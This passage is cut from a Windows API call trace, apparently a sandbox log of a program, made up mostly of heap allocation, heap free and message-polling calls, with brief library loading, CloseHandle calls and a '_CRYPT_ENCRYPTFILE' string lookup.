wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.487] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0109.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0109.488] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0109.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0109.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0109.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0109.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0109.491] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0109.491] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0109.491] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0109.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0109.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0109.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0109.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0109.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0109.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0109.493] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0109.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0109.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0109.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0109.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.494] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0109.494] CloseHandle (hObject=0x298) returned 1 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0109.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0109.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0109.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.495] FreeLibrary (hLibModule=0x772d0000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0109.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.496] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0109.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0109.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0109.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0109.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0109.497] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0109.497] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 